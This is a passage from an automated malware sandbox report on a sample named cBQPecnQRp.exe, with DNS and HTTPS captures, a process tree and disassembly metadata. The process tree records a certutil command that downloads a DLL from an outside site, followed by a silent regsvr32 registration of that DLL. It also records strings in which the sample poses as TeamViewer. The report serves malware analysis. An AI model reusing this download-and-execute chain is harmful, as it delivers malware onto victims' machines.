Sep 15, 2021 13:48:25.411534071 CEST	53	49285	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 15, 2021 13:47:27.737127066 CEST	192.168.2.4	8.8.8.8	0xbe2e	Standard query (0)	www.christchurchmvl.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:47:30.207760096 CEST	192.168.2.4	8.8.8.8	0xefdf	Standard query (0)	www.christchurchmvl.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 15, 2021 13:47:27.914834023 CEST	8.8.8.8	192.168.2.4	0xbe2e	No error (0)	www.christchurchmvl.org	christchurchmvl.org		CNAME (Canonical name)	IN (0x0001)
Sep 15, 2021 13:47:27.914834023 CEST	8.8.8.8	192.168.2.4	0xbe2e	No error (0)	christchurchmvl.org		100.26.95.170	A (IP address)	IN (0x0001)
Sep 15, 2021 13:47:30.271061897 CEST	8.8.8.8	192.168.2.4	0xefdf	No error (0)	www.christchurchmvl.org	christchurchmvl.org		CNAME (Canonical name)	IN (0x0001)
Sep 15, 2021 13:47:30.271061897 CEST	8.8.8.8	192.168.2.4	0xefdf	No error (0)	christchurchmvl.org		100.26.95.170	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.christchurchmvl.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49772	100.26.95.170	443	C:\Windows\SysWOW64\certutil.exe

Timestamp	Direction	Data
2021-09-15 11:47:29 UTC	OUT	GET /volunteer/actXApiLib.dll HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Accept: / User-Agent: Microsoft-CryptoAPI/10.0 Host: www.christchurchmvl.org
2021-09-15 11:47:29 UTC	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Sep 2021 11:47:29 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1
2021-09-15 11:47:29 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49773	100.26.95.170	443	C:\Windows\SysWOW64\certutil.exe

Timestamp	Direction	Data
2021-09-15 11:47:31 UTC	OUT	GET /volunteer/actXApiLib.dll HTTP/1.1 Accept: / User-Agent: CertUtil URL Agent Host: www.christchurchmvl.org Cache-Control: no-cache
2021-09-15 11:47:31 UTC	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Sep 2021 11:47:31 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1
2021-09-15 11:47:31 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: cBQPecnQRp.exe PID: 5760 Parent PID: 5368

General

Start time:	13:46:42
Start date:	15/09/2021
Path:	C:\Users\user\Desktop\cBQPecnQRp.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\cBQPecnQRp.exe'
Imagebase:	0x400000
File size:	1363448 bytes
MD5 hash:	53817315B195E328CCC0F56B15B247C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 6152 Parent PID: 5760

General

Start time:	13:47:24
Start date:	15/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\cmd.exe
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1368 Parent PID: 6152

General

Start time:	13:47:25
Start date:	15/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: certutil.exe PID: 4528 Parent PID: 6152

General

Start time:	13:47:26
Start date:	15/09/2021
Path:	C:\Windows\SysWOW64\certutil.exe
Wow64 process (32bit):	true
Commandline:	certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Imagebase:	0x10a0000
File size:	1273856 bytes
MD5 hash:	D056DF596F6E02A36841E69872AEF7BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: regsvr32.exe PID: 5340 Parent PID: 6152

General

Start time:	13:47:32
Start date:	15/09/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Imagebase:	0x1370000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: cBQPecnQRp.exe PID: 5760 Parent PID: 5368 cBQPecnQRp.exeCOMMON

Executed Functions

Function 004321AB, Relevance: 11.8, APIs: 1, Strings: 5, Instructions: 1254memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(-74C3748C,0043071C,?,9066DB33,00000025,00000000), ref: 00432C0E

Strings

3=BoO, xrefs: 0043274F
h6qO, xrefs: 00432743
0ty, xrefs: 004321E8
V?$TF_ES@URSA@CryptoPP@@V?$OAEP@VSHA1@CryptoPP@@VP1363_MGF1@2@@2@H@CryptoPP@@URSA@2@V?$OAEP@VSHA1@CryptoPP@@VP1363_MGF1@2@@2@@CryptoPP@@@CryptoPP@@, xrefs: 004324A5
)=KO, xrefs: 004325EC

Memory Dump Source

Source File: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID: )=KO$0ty$3=BoO$V?$TF_ES@URSA@CryptoPP@@V?$OAEP@VSHA1@CryptoPP@@VP1363_MGF1@2@@2@H@CryptoPP@@URSA@2@V?$OAEP@VSHA1@CryptoPP@@VP1363_MGF1@2@@2@@CryptoPP@@@CryptoPP@@$h6qO
API String ID: 544645111-272967424
Opcode ID: 61ef847510b74c29e3134e7b35d2ae75e545201272b3e928513a6071ea3ac76c
Instruction ID: b3ff631005ce6b73511edd40570d3557a7504fb0ba46d4a81f4b7adfa1692434
Opcode Fuzzy Hash: 61ef847510b74c29e3134e7b35d2ae75e545201272b3e928513a6071ea3ac76c
Instruction Fuzzy Hash: 1C921377D503288BD748DF7AEEC617A3662E7C0318342923ED806D756ADE385426CACD

Uniqueness

Uniqueness Score: -1.00%

Function 00440690, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 592timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,2B7C607E,004FC4F0,?), ref: 004406E0

Strings

~`|+, xrefs: 004406BB

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: LocalTime
String ID: ~`|+
API String ID: 481472006-3443854377
Opcode ID: 89c26d657daa65f05bb0a0f6b675b95da0650602db8c97c1fd14f6fcfb685626
Instruction ID: 553a44d123203fd292987d79abec9529b1e076e9ac98f04d45468dc2c0d808a7
Opcode Fuzzy Hash: 89c26d657daa65f05bb0a0f6b675b95da0650602db8c97c1fd14f6fcfb685626
Instruction Fuzzy Hash: E942D271E10268CBEB24CF28CD45BDDB7B1BF85308F10869DD148AB291E7786A98CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00432A00, Relevance: 1.8, APIs: 1, Instructions: 280memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(-74C3748C,0043071C,?,9066DB33,00000025,00000000), ref: 00432C0E

Memory Dump Source

Source File: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a50e87235c7afcdf5090e43a1b32d22132ce18f1eb582210fb8e01b9c2b95bfc
Instruction ID: 8e8811ccfeae2a6eb507cbb5166be269e3d99bf2539162c9f41dfc277c10414f
Opcode Fuzzy Hash: a50e87235c7afcdf5090e43a1b32d22132ce18f1eb582210fb8e01b9c2b95bfc
Instruction Fuzzy Hash: CA912836D543288BC758EF35EEDA0793662E784308341923ED447C75AADF386026C6CD

Uniqueness

Uniqueness Score: -1.00%

Function 004340B0, Relevance: 1.7, APIs: 1, Instructions: 418memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000005C,00001000,00000040,-000000049AB09BCE,-000000041578BB0E,-0000000A44BC5848), ref: 00434341

Memory Dump Source

Source File: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cb45e034d82756c6517d6fcbabaf867203570a8dd2c47ab620c3c37a09e14edc
Instruction ID: c47107eb98eb1777ae4dcbb1b491ec5fa49a4b4cef2e5082211cc2e26ef2ae60
Opcode Fuzzy Hash: cb45e034d82756c6517d6fcbabaf867203570a8dd2c47ab620c3c37a09e14edc
Instruction Fuzzy Hash: 25E1CF77D403698BD748CF79AECA2B677A2F780314746823AC846DB165CB342426CBCD

Uniqueness

Uniqueness Score: -1.00%

Function 0044FE43, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0004FE50,0044F565), ref: 0044FE48

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 44612b6a6f1ddf7c27f0d7096a77937640af1a05cf445d81056d549969a2861e
Instruction ID: d8d358d044583386736527b875d13f4c8ef9fb7c615acf0cd3d16a9c622e7517
Opcode Fuzzy Hash: 44612b6a6f1ddf7c27f0d7096a77937640af1a05cf445d81056d549969a2861e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00434380, Relevance: 38.9, APIs: 20, Strings: 2, Instructions: 396memorysleeppipeCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0043442B
VirtualAlloc.KERNELBASE(00000000,00000100,00001000,00000004), ref: 00434462
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00434483
VirtualAlloc.KERNELBASE(00000000,00000044,00001000,00000004,?,00001000,00000004), ref: 0043451C
VirtualAlloc.KERNELBASE(00000000,00000010,00001000,00000004), ref: 0043453D
VirtualAlloc.KERNELBASE(00000000,0000000C,00001000,00000004), ref: 0043455A
CreatePipe.KERNELBASE(?,?,?,00000000), ref: 004345A2
CreatePipe.KERNELBASE(?,?,?,00000000), ref: 004345CC
VirtualAlloc.KERNELBASE(00000000,00001FFF,00001000,00000004), ref: 004345F7
CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000001,08000000,00000000,00000000,?,00000000), ref: 00434639
VirtualAlloc.KERNELBASE(00000000,00001FFF,00001000,00000004), ref: 0043465D
VirtualAlloc.KERNELBASE(00000000,00000400,00001000,00000004), ref: 00434687
SetNamedPipeHandleState.KERNELBASE(?,00000001,00000000,00000000), ref: 00434698
Sleep.KERNELBASE(000003E8), ref: 004346A0
ReadFile.KERNELBASE(?,00000000,00001FFF,?,00000000), ref: 004346B2
Sleep.KERNELBASE(000003E8), ref: 00434732
GetExitCodeProcess.KERNELBASE(?,?), ref: 0043473E
ReadFile.KERNELBASE(?,?,00001FFF,?,00000000), ref: 0043475F
Sleep.KERNELBASE(000003E8), ref: 00434782
GetExitCodeProcess.KERNELBASE(?,00000103), ref: 0043478B

Strings

~`|+, xrefs: 004347E4
~`|+, xrefs: 00434486, 00434567, 00434597

Memory Dump Source

Source File: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$Alloc$CreatePipeProcessSleep$CodeExitFileRead$FreeHandleNamedState
String ID: ~`|+$~`|+
API String ID: 3401167436-2422257929
Opcode ID: 055b18aeb66fcdea0df172fc180fdec64c2e2b687ad8627267d8cee79e5eaef1
Instruction ID: a4bc5b2e02f4d48bc725d164443ee3d0cca38881cdff7c072dc8769f9a0d0734
Opcode Fuzzy Hash: 055b18aeb66fcdea0df172fc180fdec64c2e2b687ad8627267d8cee79e5eaef1
Instruction Fuzzy Hash: 5BE1C370A00254AFDF159FA4CC89BEE7FB5FF49701F104099FA05AE285D7759A01CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00420350, Relevance: 37.3, APIs: 14, Strings: 7, Instructions: 576librarythreadCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNELBASE(?,00000000,00000800,2B7C607E,?,?,?,?,?,?,?,?,?,?,004ADAD0,000000FF), ref: 004203B7
GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004ADAD0,000000FF), ref: 004203CA
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,004ADAD0,000000FF), ref: 004203F2
LoadLibraryExA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004ADAD0), ref: 0042043C
GetSystemDirectoryA.KERNEL32 ref: 00420470
LoadLibraryExA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?), ref: 00420500
LoadLibraryExW.KERNEL32(?,00000000,00000800,Riched20.dll), ref: 0042061D
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00420643
FreeLibrary.KERNEL32(00000000), ref: 004206CE
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,0000000C), ref: 00420710
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,0000000C), ref: 004208ED
GetCurrentThreadId.KERNEL32 ref: 00420926
EnterCriticalSection.KERNEL32(004F4AE4,?,?,?,?,?,?,?,0000000C), ref: 00420934
LeaveCriticalSection.KERNEL32(004F4AE4,?,?,?,?,?,?,?,0000000C), ref: 0042094D

Strings

Critical Error!, xrefs: 00420770
+, xrefs: 00420AD6
SVWhJO, xrefs: 00420955
library not found, xrefs: 0042053F
Verification of your TeamViewer_Note version failed!TeamViewer_Note will quit for security reasons. Please reinstall TeamViewer., xrefs: 00420775
Riched20.dll, xrefs: 004205EC
~`|+, xrefs: 0042036F, 0042056C

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$Load$Module$CriticalFileNameSection$CurrentDirectoryEnterErrorFreeHandleLastLeaveSystemThread
String ID: Critical Error!$Riched20.dll$SVWhJO$Verification of your TeamViewer_Note version failed!TeamViewer_Note will quit for security reasons. Please reinstall TeamViewer.$library not found$~`|+$+
API String ID: 3099587165-1231513073
Opcode ID: 5d1e1626f15f87e7f3dcc264a9710af5f5bcec9a89825cc0faceb765bccc2b71
Instruction ID: db19de30f6fb34002eb5a34033f5ca332a47bdf7660ba683db4b76693b3e9a3b
Opcode Fuzzy Hash: 5d1e1626f15f87e7f3dcc264a9710af5f5bcec9a89825cc0faceb765bccc2b71
Instruction Fuzzy Hash: 7022DF71600314AFDB20DF65E845BABBBE4BF44308F40452EFA4697291DB78E948CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00434450, Relevance: 37.1, APIs: 19, Strings: 2, Instructions: 329memorysleeppipeCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000100,00001000,00000004), ref: 00434462
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00434483
VirtualAlloc.KERNELBASE(00000000,00000044,00001000,00000004,?,00001000,00000004), ref: 0043451C
VirtualAlloc.KERNELBASE(00000000,00000010,00001000,00000004), ref: 0043453D
VirtualAlloc.KERNELBASE(00000000,0000000C,00001000,00000004), ref: 0043455A
CreatePipe.KERNELBASE(?,?,?,00000000), ref: 004345A2
CreatePipe.KERNELBASE(?,?,?,00000000), ref: 004345CC
VirtualAlloc.KERNELBASE(00000000,00001FFF,00001000,00000004), ref: 004345F7
CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000001,08000000,00000000,00000000,?,00000000), ref: 00434639
VirtualAlloc.KERNELBASE(00000000,00001FFF,00001000,00000004), ref: 0043465D
VirtualAlloc.KERNELBASE(00000000,00000400,00001000,00000004), ref: 00434687
SetNamedPipeHandleState.KERNELBASE(?,00000001,00000000,00000000), ref: 00434698
Sleep.KERNELBASE(000003E8), ref: 004346A0
ReadFile.KERNELBASE(?,00000000,00001FFF,?,00000000), ref: 004346B2
Sleep.KERNELBASE(000003E8), ref: 00434732
GetExitCodeProcess.KERNELBASE(?,?), ref: 0043473E
ReadFile.KERNELBASE(?,?,00001FFF,?,00000000), ref: 0043475F
Sleep.KERNELBASE(000003E8), ref: 00434782
GetExitCodeProcess.KERNELBASE(?,00000103), ref: 0043478B

Strings

~`|+, xrefs: 004347E4
~`|+, xrefs: 00434486, 00434567, 00434597

Memory Dump Source

Source File: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$Alloc$CreatePipeProcessSleep$CodeExitFileRead$FreeHandleNamedState
String ID: ~`|+$~`|+
API String ID: 3401167436-2422257929
Opcode ID: 0defe477559a93e708e33e4a80188263a95bde2cb214a32084e84cb167c61ca1
Instruction ID: 09edc278e5b74bf91fb56a01916bef08ab0bc7609cb7df9adf54cf87ed12eaeb
Opcode Fuzzy Hash: 0defe477559a93e708e33e4a80188263a95bde2cb214a32084e84cb167c61ca1
Instruction Fuzzy Hash: 2EC19E71A00214AFEB119FA4CC89FDE7FB5FF49701F200099FA05AA2D5DBB59941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0044F2B7, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(004FA47C,00000FA0,?,?,0044F295), ref: 0044F2C3
GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,0044F295), ref: 0044F2CE
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0044F295), ref: 0044F2DF
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS,?,?,0044F295), ref: 0044F2F1
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable,?,?,0044F295), ref: 0044F2FF
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0044F295), ref: 0044F322
___scrt_fastfail.LIBCMT ref: 0044F333
DeleteCriticalSection.KERNEL32(004FA47C,00000007,?,?,0044F295), ref: 0044F345
CloseHandle.KERNEL32(00000000,?,?,0044F295), ref: 0044F355

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 0044F2C9
WakeAllConditionVariable, xrefs: 0044F2F7
kernel32.dll, xrefs: 0044F2DA
SleepConditionVariableCS, xrefs: 0044F2EB

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 3578986977-3242537097
Opcode ID: a7864a2c2eba90033245f53a2bc5360d28c3903d0ed5026ec06c3744b1376071
Instruction ID: 69bfb791425c5235688d60dfdfdb69f0262128bf46dab210f5fab81d7622e33f
Opcode Fuzzy Hash: a7864a2c2eba90033245f53a2bc5360d28c3903d0ed5026ec06c3744b1376071
Instruction Fuzzy Hash: 4801B175A403016BEB206F74BD4DB6B3AA8AB44B01B180132FF09D3290DBA8CC10C67D

Uniqueness

Uniqueness Score: -1.00%

Function 00428090, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004280DC
std::_Lockit::_Lockit.LIBCPMT ref: 004280FE
std::_Lockit::~_Lockit.LIBCPMT ref: 0042811E
__Getctype.LIBCPMT ref: 004281B7
__Getcvt.LIBCPMT ref: 004281CD
std::_Facet_Register.LIBCPMT ref: 00428204
std::_Lockit::~_Lockit.LIBCPMT ref: 00428228

Strings

~`|+, xrefs: 004280BB

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

